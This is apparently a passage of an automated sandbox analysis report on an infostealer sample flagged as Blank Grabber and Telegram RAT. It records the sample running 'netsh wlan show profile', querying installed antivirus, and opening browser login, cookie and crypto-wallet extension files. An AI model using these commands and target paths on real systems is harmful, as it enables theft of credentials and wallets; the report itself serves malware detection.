              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1EC330 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6FB1EC330
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB20518C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF6FB20518C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B348CC GetModuleFileNameW,GetVersionExW,LoadLibraryW,LoadLibraryW,65_2_00007FF629B348CC
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Uses netsh to modify the Windows network and firewall settings
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected Blank Grabber
              Source: Yara matchFile source: 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1982906328.000002290B033000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1738014114.000002290AE01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1985975693.000002290ACD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1986903181.000002290AFF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1720264732.000001F32EEE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1984419770.000002290AFF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1982629773.000002290B711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1720264732.000001F32EEE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1983434642.000002290B038000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1983989604.000002290AFCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: e45AiBoV6X.exe PID: 7380, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: e45AiBoV6X.exe PID: 7396, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI73802\rarreg.key, type: DROPPED
              Yara detected Telegram RAT
              Source: Yara matchFile source: Process Memory Space: e45AiBoV6X.exe PID: 7396, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: e45AiBoV6X.exe, 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Electrum
              Source: e45AiBoV6X.exe, 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxxz
              Source: e45AiBoV6X.exe, 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodusz
              Source: e45AiBoV6X.exe, 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: EthereumZ
              Source: e45AiBoV6X.exe, 00000001.00000002.1987882294.000002290B4E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sers\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: e45AiBoV6X.exe, 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystoreZ
              Tries to harvest and steal WLAN passwords
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pingsJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqliteJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldoomlJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64fJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqliteJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqliteJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqliteJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqliteJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareportingJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackupsJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285fJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pingsJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archivedJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\eventsJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqliteJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfakJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\TempJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumpsJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98aJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeeaJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashesJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\defaultJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
